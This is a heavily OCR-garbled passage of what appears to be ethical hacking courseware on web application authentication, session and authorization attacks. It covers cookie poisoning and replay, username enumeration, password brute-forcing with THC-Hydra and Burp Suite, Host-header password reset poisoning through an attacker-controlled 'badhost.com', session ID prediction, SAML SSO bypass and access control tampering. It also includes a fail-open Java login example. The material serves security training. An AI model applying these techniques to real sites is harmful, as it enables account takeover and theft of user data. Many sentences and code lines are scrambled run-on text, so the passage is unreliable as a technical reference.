Sessionpoisoning:It allowsan attackerto injectmalicious content, the
user's onlineexperience,andobtainunauthorized information,
CookieExploitation
exploitation
Cookie attacksare ofthefollowing
types:
© Cookie
poisoning:It is a typeof parameter attackin whichthe attacker
tampering
modifiesthe cookie contents to drawunauthorizedinformationabout a user and
thusperform identitytheft.
Cookiesniffing: It is atechnique
in whichan attackersniffsa cookiecontaining
the
sessionID of the victim whohaslogged websiteandusesthecookieto
i n to a target
bypasstheauthenticationprocess andlogin to thevictim’s
account.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Cookiereplay:
It is a technique a legitimate
usedto impersonate user byreplaying
the session/cookie
that contains the session ID of that user (aslongas he/she
remains logged
in).Thisattackstopsworking once the user logs
out of the session.
=
Bypass
Authentication
©
Bypass SAML-based SSO:Attackerstake advantage misconfigurations,
of signature
sessionexpirytimeouts,s essionreplays,
misdirected
SAMLmessages,etc.,to bypass
SAML-based
SSO
authentication.
Flawsin AuthenticationMechanism
Design
Authentication mechanisms
are more vulnerableto attacksthan other implementations
involved in web application security. Applications usuallyvalidate a user via his/her
login
credentials;even a minor weaknessi n this authenticationprocesscan lead to serious
consequences suchasgranting a ccessto illegitimate
users.
=
BadPasswords: Anyapplication is designedto haveminimum controlover checking and,
validatingthe user credentials. Usersoften come across applications that accept
passwords suchas blankor shortvalues,ordinary names,dictionary words,the same
password as the username, and default parameters. Suchpasswords can be easily
guessed bythe attackers,allowing themto accessthe applicationresources,
Brute-ForcibleLogin:
Theloginfeatureof an application
allowsan attackerto predict
user credentials, through can enter the application
whichtheattacker illegitimately.
If
the application
permitsnumerous loginattemptswithout any restrictions,suchas
blocking
an account aftera certain number
of attempts,attackers
can continue to try
different passwords
until theyfind the righto ne. Thus,
even an unprofessional
hacker
login bymanually
‘can entering differentpassword combinations.
Verbose Anyloginformof an application
FailureMessages: users to feedat
requests
leasttwo fields,
namely
username and password.
A few applications
may alsoaskfor
additionalparameters suchas DOB,answer to a security and OTPpin, to
question,
validatea user. If the loginattemptis unsuccessful, the application
indicatesthat the
information provided is not valid.When specifies
the application whichfieldis incorrect
Corpops up reasons for denying can easily
access, attackers exploit
that field bytryinga
large
s et of similar names or wordsto enumerate valid data required
to accessthe
application,
Thelistof enumerateddatacan alsobeusedlaterfor socialengineering.
InsecureTransmissionof Credentials:if an application makesan insecure HTTP
it becomes
connection to passsensitive information, susceptibleto MITM attacks,
through whichattackerscan eavesdropon and impede data transmission.Eventhough
the HTTPS connection is made,attackers
can stillstealthecredentialsif the application
handlescredentialsi n an insecure manner suchas passinginformationas query string
andstoring
parameters, credentialsi n cookies.

PasswordResetMechanism:in most applications,

the passwordreset mechanism
is
mandatoryand applied
periodically
to reducethe threat of compromised
passwords.
Moreover,when users notice misuse of theycan change
their credentials, their

ical andCountermensores
Mackin ©by E-Comel
Copyright
passwords
immediately this password
use. Sometimes,
to preventillegitimate reset
featurecan alsobe exploited. Vulnerabilitiesthat are ignored
i n the main login
function
appearagaini n thepassword
‘can reset mechanism. Someoftheflawsin the password
reset mechanism a re as follows:

>
theverboseerror, specifying
Generating ifthe username is valid
© Enabling
guessing of“Existing
password―
fieldwithoutanyrestrictions
Checkingif “New Password―
and “Confirm
Password―
fieldscomprisethe same
valuesonlyafter authenticating password,
the existing thereby an attack
permitting
in identifying
to besuccessful theexistingpassword explicitly
Forgotten
PasswordMechanism:Aswith the password mechanism,
change methods
for recoveringforgotten
passwords oftenentailissues that are commonly ignoredi n the
main login function,
suchas enumerating usernames.Additionally,severaldesign flaws
i n the forgotten
password mechanism often makeit more vulnerable, through which
the overallauthenticationlogicof an application is targeted. Someof the flawsin the
forgotten passwordmechanism a re as follows:

©.

©
Providing
a secondary

Developers
challenge
whena
oftenignorethe chances
user
forgets
application
of the
a

being
password
brute-forcedduring
the password recovery process.If the applicationallowsany numberof attemptsto
recover the password, it is highlylikelythat the password will be recoveredby
guessingrandomanswers relatedto the user
“Remember Me― Functionality: Applications alsoprovide the “Remember Me― function
for convenience to avoidreentryof the username and password whena user tries to
sign into an application from his/her device repeatedly. This mechanismis often
vulnerable because the user can beattackedfromboth a localcomputer and userson
other machines. “Remember
Whenthesecookiesare initiated,
Me―
are
functions enforcedwith some persistent
the application
storedin the earliersession and generates
trusts themas they
a new session without asking
cookies.
were already
for the login
credentialsagain.Attackers can trya listofordinary wordsor enumerated usernamesto
gaincomplete access to the application without being validated.
User Impersonation: Some privileged users access applications using other user
credentialsto assisttheoriginal usersi n performing their operations. Forinstance,ifthe
Internet connection is broken, the user contacts the service provider to seekadvice.
Then,the customer care executive logins with the user data in his or her systemand
assiststhe user i n resolving
to impersonate
escalation,
others,
though
If
the service outage. an application
anyflawsi n theimpersonating
whichan attackerc an gaincomplete
logic
allowsprivileged

accessto the application.

users
can leadto verticalprivilege

are designed
ImproperValidation of Credentials: Applications with proper
authenticationmechanisms passwords
suchas accepting with a minimum length and
allowingcase-sensitive (upper
and lower case},
numeric, and special characters.By
contrast,a poorlydesigned application's
authenticationmechanisms not onlyignore

ical andCountermensores
Mackin ©by E-Comel
Copyright
 good implementations
security but also fail to considerthe user’s
attemptsto apply
password
strong characters
some applications
For instance, shortenthe password andevaluateonlythe first few
characters. checkfor case-insensitivepasswords
A few applications andothersperform
‘unusual
characterstripping
beforepassword checks.Attackerscan perform
automated
password guessingattackson suchapplicationsto remove the unwantedtest casesand
shortenthe numberof requests requiredto compromisean account.
A few applications
PredictableUsernamesand Passwords: produce
usernames
‘automatically
basedon a predictable sequence. Attackersexploit this characteristicof
and instantly
a n application acquirethevalid listof usernames,through whichthey c an
perform furtherattacks.
Sometimes, the user list is createdall at once or i n the form of groups, and all these
users’
initialpasswords are distributed via some sources. Thesources for creating
passwords can allow the attacker to guess the passwords of the users. Such
are oftentriggered
vulnerabilities within an intranetenvironment.
InsecureDistribution of Credentials:
Most applications adopt in which
a procedure the
logincredentialsa re supplied
via SMS, email, post,etc. In some cases,what is supplied
to users may includenot onlylogincredentials but also a URLconsisting of an
“activation

enrolling
to change
code― the system-generated
or initially
bunchofsuchURLsare sent to the same users, attackers
multiple
generated passwords.
user accounts anddeducethe activation codessent via URLs
If
can discoverthis activityby
to the
a
newly
enrolledandyet-to-beenrolledusers.
Implementation
Flawsi n Authentication
Mechanism
Sometimes,
carefully
designed
application mechanisms
security to attacksdue
opengateways
‘to
some mistakesin their enforcement.Thesemistakesmay lead to informationleakage,
bypassingof login or diminishing
security, module.Implementation
of the entire security flaws
i n authenticationare more dangerous as they cannot be discoveredwith normaltesting
methods.Someof the implementation flawsin authenticationmechanisms are as follows:
‘=
Fail-Open Login
exceptions,
M echanism:Itis a logicd efectthat
the authenticationprocess.For instance,invoking
suchas 2 null pointerexception,
leadsto significant
consequences
db.getUser()
as the requested
can triggersome
functionhasno username
in.
or password credentialsbut it can still login, Thissession may be dependent on a
specific
user identity; hence, even when it is not fullyfunctional,it can still allow
attackersto access criticalinformationor functionality.
Example,
Response
Public
try (
verifyLogin
(Session mySession)
{

String username mySeasion.getParameter

=
(“username―)
password mySession.getParaneter(“password―)
‘String =
;
User thisUser =
db.getUser (username,password)
ical
;
andCountermensores
Mackin ©by E-Comel
Copyright
 4€(thisveer null) (
==

//snwalid credentials
mySession.setMessage (“Login
Failed.―)
return dotogin(mySession) ;

»
)
catch (Exception e) ()
JIvalid user

return ;
mySession.setMessage

doMainMenu
("Login successful!―)
(mySession}
,
Flawsin Multistage LoginFunctionality:
Multistageloginfunctionality
is an advanced
securitymechanism for username-and-password-based
loginmodels.Thislogin method
is performed username and password
in three stages: entry,a challengefor certain
inputdigits or memorable characters,
andvaluesubmissions disclosedon changing a
physical
or
token.Thefirst stageinvolvesusersvalidating
other
input,
valid andthe remainingstages
validationsoftencome with different carry
out with
themselves their username
different
validation
knownas logic
vulnerabilities
checks.
defects.
Such

InsecureStorage Although
of Credentials: an application
mayhaveno inherentflaws,
it
can bystoringlogincredentials
makeitselfvulnerable i n an insecure way. In general,
applications
store user credentialsi n a databaseIn an unencrypted
form, Some
applications algorithms
use weak encryption to encryptand store credentials.
Vulnerabilitiesin suchimplementations
allow attackersto perform
brute-forceand
passwordcracking attacks.
UsernameEnumeration
Source:https://wordpress.com
If a login
error stateswhichof the usernameor password that field can be guessed
is incorrect,
Usingthe trial-and-error
Consider the following
method.
example. Anattackertries to enumerate theusername andpassword of
“RiniMatthews―on wordpress.com. In the first attempt,the attacker tries to loginas
whichresultsi n thelogin
“rini.matthews,― failuremessage“invalid
emailor username.―

ical andCountermensores
Mackin ©by E-Comel
Copyright
 rini.matthews

Figure forwermame
14.6: Err message does
not exist

In the secondattempt,
the
statingthat the password
username
attacker
“rinimatthews―
tries
exists.
to login
as “rinimatthews,―
whichresultsi n a message
enteredfor the username is incorrect,thus confirming
that the

forusername
24.63:Eror meszage
Figure successfully
enumerated
t rnimatthews

Note: Username enumeration fromverboseerror messages will fail if the application

hasan
account lockoutpolicy,
whereby the account is automatically
lockedafter a certain numberof
failedlogin
attempts.
Someapplicationsautomatically
generateaccount usernames basedon a sequence(e..,
“userl02―).
“useri01,― Therefore,attackers can performusername enumeration by
determining
the appropriate
sequence.
Password Functionality
Attacks:Password Exploits
=
PasswordChanging:
Determinethe password change functionalitywithin the
application
byspidering
the application a login
or creating account. Tryrandomstrings

ical andCountermensores
Mackin ©by E-Comel
Copyright
 for the “Old
Password―, and "Confirm
Password―,
“New the NewPassword―
fieldsand
analyze
errors to identify
vulnerabilitiesi n the password
change
functionality.
PasswordRecovery: “Forgot
Password― featuresgenerally a challenge
present to the
user; if the numberof attemptsis not limited,a n attackercan guessthe answer and
solvethe challenge successfully
with the helpof socialengineering.Applications
may
alsosenda uniquerecoveryURLor existing password to an emailaddressspecified
by
the attackerif the challenge
is solved

“Remember Exploit:
Me’ Me"functionsare implemented
“Remember usinga simple
cookiesuchas RememberUser=jason
persistent sessionidentifiersuchas,
of a persistent
RememberUser=ABY112010.
Attackerscan use a n enumeratedusername or the
predict
bypass
sessionidentifierto
authenticationmechanisms.
Password Guessing
Attacks:Password
name implies,
As its password is the process
guessing of guessingpossible user keywords that
mightconstitute an account passworduntil eventuallyarrivingat the correct one. To guess
passwords,
attackersuse techniquessuchas password listsandpassword dictionaries.
Password list
Themajorityof keywordsusedfor preparingthe password
list includescertain daily
usage wordssuchas birth date,street name, nickname,
anniversary date,phone
number, pin number,
or name,
parent'sfriend’s andpet's
n ame.
Createa list of possible
footprinting
password
passwords usingthemost commonly
andsocialengineeringtechniques,
is discovered.
usedpasswords
andtryeachpassword
as as
until the correct well
Dictionary
Password
password
‘A dictionary
is the compilation
of wordandnumbercombinations that could
bepasswords.
Createa dictionary
of
Thistype attack savestime compared
of all possible
passwords
to a bruteforceattack.
usingtoolssuchas Dictionary
Maker to
performdictionary
attacks.
Tools
guessingc an be performed
Password manually
or usingautomatedtoolssuchas THC-
Hydra,
BurpSuite,
andDictionary Maker.
o THC-Hydra
Source:https://www.the.org
THC-Hydra
is a networklogon
crackerthat supports
manydifferentservices,suchas
IPv6 andInternationalized
RFC4013. It comes with a GUI andsupportsHTTP proxy
andSOCKS proxy.Furthermore,it usesvarious authenticationmethodsforservices,
including
Firebird,
FTP,
IMAP, MS-SQL,
LDAP, RDP,SMTP,
SNMP,
andTelnet.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 not
use
10.10. 10.16
Please d o in

the-hydra) starting at

41174 Login trie

rute-forcing
1464;
Figure
of
Screenshot THC-Hydra

Brute-forcing
is anothermethodusedforcracking passwords.
Guessing
becomes crucial
when

Used,
is long
the password or contains lettersi n upper andlower
it couldtakeseveralyearsto guessthepassword, cases.
If numbersand symbols
whichis impractical.
are

Try
to crackthe passwordbytrying possible
all values
from a set of alphabetical,
numerical,
and
special Usepassword
characters. crackingtoolssuchas BurpSuite to crackthe password.

Cracking
Password Tools
Somebrute-forcing
toolsfor cracking
passwords
are described
below.
=
BurpSuite
Source:https://portswigger.net

Burp Suiteis an integratedplatform

for performing
security testingof webapplications.
It hasvarious toolsthat worktogether the entire testingprocess,
to support frominitial
mappingandanalysis
of an application's
attacksurfaceto finding
andexploiting
security
vulnerabilities

Burp
©
Suite built-intools
Intercepting and modifying
proxy for inspecting traffic betweenyour browserand
the targetapplication
Application-aware
spider for crawling
content andfunctionality
Web application
scanner for automatingthe detectionof numerous typesof
vulnerabilities
Intruder tool for performing
customizedattacks to find and exploitunusual
vulnerabilities
toolfor manipulating
Repeater andresending
individualrequests

‘Sequencer
tool fortestingtherandomness
ofsessiontokens

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Payload
Positions

‘navn
poylouan
arete
och
payed
pontvons
tea
fer
hi signed hb tas
* ‘tart
attack

14.65Screenshot
Figure of BurpSuite
Someadditionalpassword
cracking
toolsare as follows:
LOphtCrack
(https://www.l0phtcrack.com)
(http://opherack
copherack sourceforge.net)
(http://project-rainbowcrack.com)
RainbowCrack
WindowsPassword
Tool
Recovery (https://www.windowspasswordsrecovery.com)
Maker(hetp://dictionarymaker.sourceforge.net)
Dictionary
Password
Attacks:AttackPassword
ResetMechanism.
Insecure password
management lead to
practices critical security
vulnerabilities.One such
vulnerability
is password
reset poisoningthat is exploited
bythe attackerto leverage
headers
suchas Host i n the HTTPrequest
message.
the password
Resetting is @common function usedbythe user when he/she forgets
his/her
password
andneedsto reset it. Theuser receives a forgotpassword
link via emailcontaining

ical andCountermensores
Mackin ©by E-Comel
Copyright
 the server responds
the one-time token,andwhenthe link is clicked, with a passwordreset
page.
For example, considerthe following
HTTPrequest wherethe attackeruses the Host headerto
perform theattack:
GET HTTP/1.1
https: //certifiedhacker.com/reset.php?email=footbar.com
Host: badhost.com
Thefollowing password reset link is sent to thevictim:
SresetPwdURL

‘The
=
abovementioned
"https://($_SERVER['HTTP_HOST'
pwdd.php?token=87654321-8765-8765-8765-10987654321"
URLlink is injected in a password
}}/reset-

reset emailand sent to the victim. As

the developersexpect $_SERVER['HTTP_HOST"] to befrom certifiedhacker.com,they
fail to perform
additionalinputsanity checks.
‘The reset poisoningattackinvolvesthe following
password steps:
=
Step1: Theattackerobtainsthe target's emailaddressusedon thewebsitethrough
techniquessuchas socialengineering andOSINT.
Step2: The
Hostheader.attacker
sendsa password
Forexample,
link to the victim usingthe altered
reset request

PosT https: //certifiedhacker.com/reset.php HTTP/1.1

Accept: */*
Content-Type: application/json
Host: badhost..com
the password
TheresultantURLfor resetting is,

php?
https: //badhost.com/reset-password token=87654321-8765-8765-
8765-10987654321
Step 3: Now, theattackerwaits for the victim to receive the modifiedemail
Step 4: Oncethe victim clickson the maliciouslinkembeddedi n the email, the attacker
extracts the password reset token.Using this token,the attackerperforms various
maliciousactivities suchas cloning web applications to stealthe user'scredentialsor

Attacks:
Session
the
actingasa proxyandmimickingbehavior
ID Prediction/Brute-forcing,
Session
andcontents ofthe originalwebsite.

Every
time a user logs
i n to a particular
website,the server assigns
a sessionID to the user to
keep
trackof all the activities on the website.Thissession ID is validuntilthe user logs
out; the
server provides
a new session ID when the user logs
in again.Attackerstry to exploit
this
session byguessingthe next session ID after
ID mechanism
For certain web applications, the session ID information
collecting
some validones.
involvesa stringof fixedwidth
Randomness to avoidprediction.
is essential

ical andCountermensores
Mackin ©by E-Comel
Copyright
 attacksare performed
Session i n the following
steps:
In the first step, collectsome valid session 1D valuesbysniffing
trafficfrom
authenticatedusers.
Analyze
the captured
sessionIDsto determinethe sessionID generation such
process,
as the structure of the sessionID,the informationthat is usedto createit, and the
encryption or hashalgorithm usedbythe application
to protect it
Vulnerable session generationmechanisms that use session IDs composed of a
username or other predictable
information,suchas timestampor client IP address,
can
beexploited byeasily validsessionIDs.
guessing
you can implement
In addition, a brute-force
technique andtest different
to generate

of
values the session ID
Fromthe diagram below,
until
you successfully
gain access the application.
to
you can see that the sessionIDvariableis indicatedbyJSESSIONID
value is “user01,―
and its assumed whichcorresponds to the username. Byguessing
i ts new
value,say,as “user
02,―
it is possible
for the attackerto gain unauthorizedaccess to the
application.
(et

Uhr
pnt
Steen
10/Web
Moe. Screee
mene 5 004
(Window
NT
ete

U Windows 5.2
entfemteplicton, plietion sine
178
em:
OHTA
rr A.A Gcko/2007051
Feeon/2
GETRequest ‘Accept Mn
et
atenpisis0 homagelog"/*
aS
teleost

fbn:
890/Wetont
eal:

CNA
ave avcsoRe
earn

14.66:
Figure Sereenshot
displaying session cookie
predictable
Exploitation:
Cookie Poisoning
Cookie
Cookies frequently
transmit sensitive credentialsfrom the client browserto the server.
can modify
‘Attackers thesewith ease to gain accessto the server or assume the identity
of
another
user.
Clientbrowsersuse cookiesto maintain a session state when theyemploy statelessHTTP
protocol IDsforcommunication.Serverstie uniquesessionsto the individual accessingtheweb
application. Poisoning of cookiesand session informationcan allow an attacker to inject
malicious
Cookies
content or
can
modify
the user's
onlineexperienceandobtainunauthorized
contain session-specific
datasuch as user IDs,passwords,
information
account numbers, links
to shopping cart contents,supplied privateinformation,and sessionIDs.Theyexist as files
storedi n the clientcomputer's memoryor on its harddisk.Bymodifying the cookiedata, an
attackercan oftengain escalatedaccessor maliciously affectthe user'ssession, Many sites
offerthe “Remember me?―
functionandstore the user informationi n a cookieso that the user
doesnot haveto re-enter the datawith everyvisit to the site. Anyprivateinformation entered
is storedi n a cookie.To protect cookies,site developers often encodethem.Encodedcookies
give developers a falsesenseof cookiesecurity, as the encoding process c an easilybe reversed
with decoding methodssuchas Base64 andROT13 (rotatingthe lettersof the alphabet through
13characters)
Module4 Page1859 ical andCountermensores
Mackin Copyright
©
by E-Comel
Cookiepoisoningis performedi n the following
steps.
If the cookiecontains passwords or sessionidentifiers,stealthecookieusingtechniques
and eavesdropping
suchas scriptinjection
Then,replaythe cookiewith the same or alteredpasswords
or sessionidentifiers
to

‘=
web
bypassapplication authentication
Trapcookiesusingtoolssuchas OWASPZedAttackProxy,andBurpSuite.
Exploitation
Cookie Tools:
=
OWASPZedAttackProxy
Source:https://www.owasp.org
ZedAttackProxy
‘OWASP Project
(ZAP) is an integratedpenetration testingtool for web
applications.
It provides
automated s cannersas well as a set oftoolsthatallowyou to
vulnerabilitiesmanually
find security

ee

[eee nn
| |
oes ee

er omutsan

14.67Screenshot
Figure ofOWASP
ZAP
2 Doge
9) Sun wi 70 we

Someadditionalcookieexploitation
toolsare as follows:
=
LophtCrack
(https://www.lOphtcrack.com)
=
Suite(https://www.portswigger.net)
Burp
Module4 Page1860 tical andCountermensores
Making by Comet
Copyright©
 =
xSSer(httpsi//xsser.03c8.net)
Bypass
Authentication:Bypass
SAML-based SSO
Thesingle
a
sign-on (SSO)
single
applications irrespectiveof the domainor platform.
a to
authenticationprocess permits user signi n to an application
s et of credentials,andthe same loginsession can be usedto
For instance,
using
access multiple
whena user logsi n using
his/her Google account on a desktop or mobiledevice, he/she i s automatically
authenticated
for other services suchas Google Drive,YouTube, andGmail.Thisauthenticationmechanism
insidedifferent applicationsis performed usingtheSAMLprotocol.
SecurityAssertionMarkup Language (SAML) is an XML-based infrastructure
that serves as an
authorizationandauthenticationmediumbetweentwo peers, suchas identity provider (IdP)
and service provider (SP).Theservice provider entrusts the identityproviderwith validating
users. Then, the identityprovider responds with an SAMLassertion (confirmation message)
aftervalidating
anyuser.

Es cgstew
Auth
‘hop @: A
mae
2

nr tee
- Qe
Service
Provider
14.65:lustrationof SAMLbased80
Figure
applications
Traditional can perform processbeforeproviding
the authentication protected
functionaccessto the user. With the evolutionof the SSOinfrastructure,
this authentication
processhasbeenhandedover to third-party identityprovider
applications
to access functions
from the service provider application.
Communication betweenthese applications can be
through
established
TheseSAMLmessages
SAML
messages.
are encrypted usingBase64encoding.Attackerscan easily
decryptthese
messagesandreadthe content of the messages.
Twomajorfieldsi n SAMLmessages, signature
and assertion,are susceptible
to midway tampering.Signature is usedto build a trust
betweenthe SPandthe IdP,and assertion is usedto directthe SPon providing
relationship
application
servicesto thevalid users.
can takeadvantage
Attackers misconfigurations,
of signature sessionexpirytimeouts,s ession
replays, SAMLmessages,etc.,to bypass
misdirected SAML-based SSOauthenticationandinsert
their own messages. Attackers u se toolssuchas SAMLRaider to bypass SAM-based SSO
authentication.SAMLRaideris a Burp Suiteextension usedfor SAMLinfrastructuretesting.It
can beusedto perform two core operations: modifying SAMLmessages andmanagingX.509
certificates

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SAMLRaider
Using
Configure the browserto proceed
with BurpSuite.OpenBurpSuitewith the new
projectandnavigate to the ‘Proxy’
tab to ensure that the proxyis activated.
In Burp tabandthengo to "BApp
Suite,first,go to the “Extender― store―, click
Then,
andinstall“SAML
Raider―
extension.

Burp
‘Access tab displays
Suite andensure that the “Proxy― “Intercept
is on―.
It enables
Burp to find andtamper with requests directedto the servers. Whentheuser'sbrowser
is pointed to the target(admin@xyz.org) website'ssecuredregistration page,BurpSuite
that
indicates theuser is passed
SAMLRaiderdisplays
system,
to the IdP
a tab with the samename whenthereis SAMLdatathat is to be
decrypted. Usersmay needto passa few more requests beforetheynotice the "SAML
Raider―
tab with a request. Clickingon the “Forward―
button can take the user to the
|dPlogin page.
Soonafterthe user enters the credentials for admin@xyx.org.fakedomain.com, Burp
once again impedes some web requests. Until it showsthe "SAMLRaider― tab,keep
clicking tab to passthem without modifications.Consequently,
the “Forward’ SAML
responses fromtheId? system can alsobe impeded.

Goingthrough
the response can allowa user to find “NamelD―’.
It is locatedbelowthe
tabs.
keyandsignature

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
Now,addyourown comment between
two domain
namesandpassthe response.

this
In
case,
signature
as
with messages
valid
14.70:Screenshot
Figure

response,
the is matchingthe
manipulating
of BurpSuite AML

theSPapproves and
processes the first text parameter admin@xyz.org,
in NamelD:
Attackersuse thistechnique to bypass the SAML-basedSSO
processandtamperwiththe
responses.

ical andCountermensores
Mackin ©by E-Comel
Copyright
AttackAuthorizationSchemes
CEH
Fis, acess the web application
wing account wth a ndthenescalate
low privleges the privleges
to acess

‘Manipulate
theHIT requests
thatrelat to
user
to subvert
theapplatonauthor
1D,userame, accesgroup, cost,lena 5 modifying
inputfeds

@ -voiorm resource ener Tampering

Parameter

©resto HTTPHeaders

© over
suing nd cookies ©sissontes

ne wow eine bai

Query
String
‘Tampering

ical
Mackin
and ©by CountermensoresCopyright
E-Comel
 |
AuthorizationAttack:CookieParameterTampering EH
¢

Attack Authorization Schemes

web application
‘A contains an authorization
mechanismthat restricts access to a specific
resource or functionality
(e.g.,
Adminpage)byauthenticatedusers. Thewebapplication always
performs user authorizationfollowing
authentication.
An attacker implements
the flawed
authorizationmechanism i n the web application
andtakesadvantage of it to access restricted
pagesbyescalating privileges. The
attacker
tries to gainaccessto informationwithoutproper
Thus,the attackerusesvarious techniques
credentials.
the web application.
to attackthe authorizationschemes of

Authorization Attack
In an authorizationattack,the attackerfirstfindsa legitimate
account with limited privileges,
then logs i n as that user, and gradually escalatesprivilegesto access protected resources.
He/she then manipulates the HTTPrequests to subvertthe applicationauthorizationschemes
bymodifying inputfieldsrelatedto the user ID,username, access group, cost,file names,file
identifiers, etc. Attackers use sources such as uniformresource identifiers, parameter
tampering, POSTdata,HTTPheaders, query strings,cookies, and hidden tagsto perform
authorization attacks.
Uniform ResourceIdentifier:
A uniformresource identifier
(URI)provides
a means to
identify It is a global
a resource. identifierfor Internet resources accessed remotely
or
locally.
An attacker
may use URIsto accessdocuments/directories that are protected
injectSQLqueries or other unusedcommandsinto an application,
from publishing,
and/ormakea
user site
that toanother
view a certain
ParameterTampering:
server.
is connected
Parametertampering involvesthe manipulation
of parameters
exchanged
betweenthe server andthe client to modify the application
data,suchas

ical andCountermensores
Mackin ©by E-Comel
Copyright
 price and quantityof products,
permissions, and user credentials.
Thisinformation is
usuallystoredin cookies, or hiddenformfields,
URLquery strings, andattackerscan use
themto increase
POSTData:POST
control
and
application
functionality.
data often comprises authorizationand sessioninformation,
as the
informationprovided bythe clientmust beassociatedwith the session that provided it.
Theattackerc an exploit
vulnerabilitiesin the postdataandeasily manipulate
it.
HTTPHeaders:Webbrowsersdo not allowheadermodification.Therefore,to modify
the header,
the attackerhasto write his/her own programandperform the HTTP
He/she
request. mayalsouse availabletoolsto modify
anydatasent fromthebrowser.
In general,
an authorization
HTTPheadercontainsa username andpassword encodedi n
Base-64.Theattackercan compromise the headerbysubmitting two HTTP requests
boundin the same header.The proxy systemexecutesthe first HTTPheaderandthe
targetsystemexecutes the otherHTTP header, allowing the attackerto bypassthe
proxy’s
access
Query
control,
String andCookies:Browsersuse cookiesto maintain their state i n the stateless
HTTPprotocol as well as to store user preferences,sessiontokens,andother data
Clientscan modify the cookiesandsendthemto the server with URLrequests, thereby
allowingthe attackerto modify thecookie content. Cookiemodification
depends on the
cookieusage,whichrangesfromsession tokensto authorizeddecision-making arrays.
HiddenTags: Whena user
selects
anything
formfieldvalueandsent to theapplication
store field valuesas hiddenfields,
on an HTML page,the selection
as an HTTP
request (GET
is stored
or POST), HTMLcan
whichthe browserdoesnot extract to the screen;
as
a
it collects
instead, during
andsubmitsthesefieldsas parameters formsubmissions,
whichthe user can manipulate. However, he/she hasto makea choice.Codesent to
browsers does not have any security value;therefore, by manipulating
the hidden
values,
the attackerc an easily
access the page andrun it i n the browser.

Tampering
AuthorizationAttack:HTTP Request
HTTP headers controlinformationpassed fromweb clientsto webservers on HTTPrequests
andfromweb servers to webclientson HTTPresponses. Eachheaderconsistsof a singletext
linewith a name anda value.Thereare two main waysto senddatawith HTTP:via the URLor
theform.Tampering with HTTPdatarefersto modifying
beforethe recipientreadsit. Theattackerchanges
user'sID.
of
data the HTTPrequest (orresponse)
the HTTP requestwithout usinganother

Query
String
Tampering
then try to change
If the query stringis visiblei n the addressbar i n the browser, the
stringparameter to bypass authorization mechanisms. Youcan use web spidering
tools
suchas BurpSuiteto scan the webapplication for POST parameters.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 hee:
certs
//wor. fiedhacker.com/nail. lbox=Johnécoapany
aspx?mai

hetpe:
//certifiedhackerbank.c adminetrve

HTTP Headers
14.71Sereenshotdsplayng
Figure Query
String
Tampering

If the application
usestheReferer headerformaking accesscontroldecisions, then try
to modifyit to access protected application
functionalities.In the example below,
ItemiD 201is not accessible
=
as the Adminparameter you can change
is set to false; it
to true andaccess protected
items.

‘Authorization
Attack:Cookie
Parameter Tampering
Cookieparameter i s a methodusedto tamperwith the cookiesset bythe web
tampering
to perform
application maliciousattacks.Whenthe user logs
into the site, the web application
setsthe sessioncookieandstoresit in thebrowser.
Cookieparameter is performed
tampering i n the following
steps:
collectsome session cookiesset bythe web application
1. In the first step, and analyze
themto determinethe cookiegeneration mechanism
In the secondstep,trapthe session cookieset bythe web application,
tamperits
parameters usingtools suchas BurpSuite,and replayit to the application
to gain
unauthorized profiles
a ccessto others’
Thetool intercepts sent from the browserand allowsyou to edit the
every request
cookieto replaceit withthe tampered cookieparameters.If the cookieis not secure,
you maybe ableto
BurpSuite guess
theparameters

Source:https://portswigger.net

Burp Suiteis an integratedplatform

forperformingsecurity testingof webapplications.
Ithas various toolsthat worktogether the entire testingprocess,frominitial
to support
mappingand analysis
of an application's to finding
attacksurface andexploiting
security
vulnerabilities,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of BurpSuite
14.73:Sereenshot
Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
 AttackAccessControls
(©wakvougha wetatetoken he lowing
cesconte Exploiting
InsecureAccessControls

Leo
cet
rn oe sstnedto
om ' (©
Archers request parameters

“Aocons
Controls
Attack
Methods
Jar
teres coions

Attack Access Controls

controlsare partofthe application's
‘Access security that are logically
mechanisms basedon
An attackerwalksthrough
authenticationand sessionmanagement. a websiteto identify
the
following
accesscontrols
detailsoftheapplication:
Individual subsetofdata
accessto a particular
=

=
of
Levels grantaccess(employees,
Administratorfunctionality
managers,
to configure
supervisors,
andmonitor:
etc.)
CEOs,

+
Functionalities
Exploiting
that
allow
escalating
Controls
InsecureAccess
privileges
=
Parameter-Based AccessControl:Anyweb application consists of various request
parameters suchas cookiesand query stringparameters. The application determines
the accessgranted to a requestbasedon theseparameters. Theseparameters vary
betweena normaluser andan administrator.Sometimes, theseparameters are invisible
to normalu sers andvisible onlyto administrators.If an attackerc an identify the
parameters that are assigned he/she
to an administrator, can set those parameters in
theirown requests
Referer-Based
to
andgainaccess administrative
functions.
AccessControl:In some web applications, the HTTPrefererI s the
foundationfor major access controldecisions.The HTTP refereris consideredunsafe;
the
attacker
can use it andmanipulate
Location-Based Access
it to
any
Control:Theuser'sgeographic
value,
locationcan bedeterminedusing
various methods.The most common methodto determinethe current location is
through Attackerscan bypass
the IPaddress, location-basedaccesscontrolsusinga web

ical andCountermensores
Mackin ©by E-Comel
Copyright
 proxy, a VPN,a data-roaming-enabled
mobiledevice,
directmanipulation
of client-side
mechanisms
AccessControlsAttackMethods
Attackwith differentu ser accounts:Attempt
to accessthe application
withdifferent
user accounts.If there is any brokenaccess controli n the web application,
it allowsyou
to accesstheresources andfunctionalityas a legitimateuser. Youcan use toolssuchas
Burp Suiteto access andcompare two differentuser contexts.
AttackMultistage
isa multistage
Processes:
process
Theabovementioned
established
process, the user will perform
technique
i n the webapplication
multiple entries at multiple
if
will beineffectivethere
architecture.In thismultistage
levels to complete the
intended process.In a multistage
process,multiple requestswill be sent to the server
fromtheclient.Toattacksucha process,eachandevery request to the server shouldbe
captured andtestedfor accesscontrols.Anotherway to attack a multistage process
manually is to walk through a protected multistage process severaltimes i n your
browser and use proxytoolsto switchthe sessiontokensupplied i n different
requests
to that of a lessprivileged
user.

Identifythe web applications

Attack Static Resources: where the protected
static
bythe URLs.Attempt
resources are accessed to request theseURLsdirectly
andcheck
whethertheyare providingaccess to unauthorizedusers.

AttackDirect Accessto Methods:Webapplications accept that provide

certain requests
